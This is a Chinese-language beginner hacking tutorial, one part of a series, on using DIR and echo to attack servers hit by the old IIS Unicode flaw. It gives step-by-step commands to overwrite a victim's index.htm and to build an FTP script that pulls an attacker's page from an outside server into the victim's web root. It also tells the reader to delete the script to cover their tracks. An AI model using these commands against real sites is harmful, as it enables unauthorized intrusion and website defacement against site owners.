黑客新手必學(xué)的入侵命令(6)
黑客入侵命令—DIR
這個(gè)命令沒什么好講,但是卻非常重要,他是查看一目錄里的所有文件、文件夾。你可以本地試下。
黑客入侵命令—echo
著名的漏洞Unicode,這個(gè)命令可以簡(jiǎn)單的黑一下有這個(gè)漏洞的主機(jī)。
我們假設(shè)我們要把“南京大**鐵證如山,任何日本人不得抵賴!”寫入index.htm,有2種方法,大家看看有什么區(qū)別。
echo 南京大**鐵證如山,任何日本人不得抵賴!>index.htm
echo 南京大**鐵證如山,任何日本人不得抵賴!>>index.htm
第一個(gè)的意思是覆蓋index.htm原有的內(nèi)容,把“南京大**鐵證如山,任何日本人不得抵賴!”寫進(jìn)index.htm。
第二個(gè)的意思是把“南京大**鐵證如山,任何日本人不得抵賴!”加到index.htm里面。
“>>”產(chǎn)生的內(nèi)容將追加進(jìn)文件中,“>”則將原文件內(nèi)容覆蓋。
大家可以本地試下。
可能你會(huì)問,這樣簡(jiǎn)單黑下有什么好玩的,其實(shí)他可以用來(lái)下載主頁(yè)到對(duì)方的目錄里。
1、首先,我們需要申請(qǐng)一個(gè)免費(fèi)的主頁(yè)空間。
2、用echo在可寫目錄下建立如下內(nèi)容的txt文件:(以chinren服務(wù)器為例。)
open upload.chinaren.com(你的FTP服務(wù)器,申請(qǐng)時(shí)你的空間提供商會(huì)給你的)
cnhack(你申請(qǐng)時(shí)的用戶名)
test(你申請(qǐng)時(shí)的密碼)
get index.htm c:\inetpub\wwwroot\index.htm(這里是把你空間上的index.htm下載到對(duì)方的c:\inetpub\wwwroot\index.htm)
bye(退出FTP對(duì)話,相當(dāng)在98下的DOS,用EXIT退出DOS)
具體的做法:
輸入 echo open upload.chinaren.com> c:\cnhack.txt
輸入 echo cnhack >> c:\cnhack.txt
輸入 echo 39abs >> c:\cnhack.txt
輸入 echo get index.htm c:\inetpub\wwwroot\index.htm+>>+c:\cnhack.txt
最后輸入 ftp -s:c:\cnhack.txt (利用ftp的-s參數(shù),執(zhí)行文件里的內(nèi)容。)等命令完成時(shí),文件已經(jīng)下載到你指定的文件里了。
注意:取得文件后,請(qǐng)刪除cnhack.txt。(如果不刪除,很容易會(huì)給別人看到你的密碼。)記得要 del c:\cnhack.txt
DIR和echo命令就為大家介紹完了,希望想成為黑客的讀者已經(jīng)掌握了這兩個(gè)命令的含義和使用,我們還會(huì)繼續(xù)為大家介紹相關(guān)內(nèi)容的。
【編輯推薦】